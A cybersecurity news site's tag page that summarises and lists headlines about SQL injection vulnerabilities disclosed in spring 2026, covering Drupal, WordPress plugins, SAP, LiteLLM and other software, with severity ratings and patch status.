#sql-injection
11 articles
Between April 14 and May 23, 2026, ZCyberNews published 12 articles on SQL injection, with 7 rated critical severity. The most severe vulnerability, CVE-2026-27681, carries a CVSS score of 9.9, while CVE-2026-36962, CVE-2026-42208, and CVE-2026-6433 each scored 9.8, and CVE-2026-34259 scored 9.6. Enterprise software, web hosting, e-commerce, retail, and software development were the top affected sectors, with Europe, North America, and global regions most impacted. The coverage included 2 medium, 3 high, and 7 critical severity reports.
MEDIUMCVE-2026-9082: Drupal Core SQL Injection Bug Added to CISA KEV
CISA added CVE-2026-9082 (CVSS 6.5) to its Known Exploited Vulnerabilities catalog after evidence of active exploitation against all supported Drupal Core versions.
HIGHAvada Builder WordPress Plugin Flaws Expose Site Credentials
CVE-2026-4782 and CVE-2026-4798 in Avada Builder (1M+ installs) let attackers read wp-config.php and extract database hashes. Patch to version 3.15.3.
CRITICALSAP Patches Critical S/4HANA, Commerce Flaws with 9.6 CVSS
SAP released 15 security notes for May 2026, fixing two critical code injection flaws in S/4HANA (CVE-2026-34260) and Commerce (CVE-2026-34263), both rated 9.6 CVSS, and a...
CRITICALUnauthenticated SQL Injection in MuuCMF T6 Allows Database Takeover
CVE-2026-36962: Unauthenticated SQL injection in MuuCMF T6 v1.9.4.20260115 lets attackers dump databases, gain admin access, and achieve RCE via file writes.
CRITICALCorteza SQL Injection Flaw CVE-2026-6093 Lets Attackers Dump Databases
CVE-2026-6093: A SQL injection vulnerability in Corteza's MSSQL backend allows unauthenticated attackers to extract database contents via Compose record meta-field filters.
CRITICALCustom css-js-php WordPress Plugin SQLi Leads to RCE (CVE-2026-6433)
CVE-2026-6433: Unauthenticated SQL injection in Custom css-js-php plugin ≤2.0.7 lets attackers execute arbitrary PHP via eval(). No patch available.
HIGHOpencart TMD Vendor System 3.x SQLi Lets Attackers Dump User
CVE-2021-47928 (CVSS 8.2): Unauthenticated blind SQL injection in Opencart TMD Vendor System 3.x lets attackers extract usernames, emails, and password reset codes from the...
MEDIUMJeecgBoot SQLi Flaw CVE-2026-8114 Exploit Publicly Available
CVE-2026-8114 (CVSS 6.5) in JeecgBoot up to 3.9.1 enables remote SQL injection via the /sys/dict/loadTreeData endpoint. Exploit code is public.
CRITICALLiteLLM CVE-2026-42208 Pre-Auth SQLi Exploited in Attacks
Attackers exploit CVE-2026-42208, a critical pre-authentication SQL injection in LiteLLM LLM gateway, to steal API keys and model data. CVSS 9.8. No patch yet.
HIGHDriveLock Privilege Escalation Flaw Allows Attackers to Bypass Security
A critical SQL injection vulnerability (CVE-2026-5490) in DriveLock endpoint security software allows authenticated attackers to escalate privileges and bypass the product's own security controls, according to the Zero Day Initiative.
CRITICALSAP Patches Critical SQL Injection Flaw in Business Planning and Consolidation
SAP has patched a critical SQL injection vulnerability (CVE-2026-27681, CVSS 9.9) in its Business Planning and Consolidation and Business Warehouse applications, allowing attackers to execute arbitrary database commands.
Stay Updated
Get the latest cybersecurity news delivered to your inbox.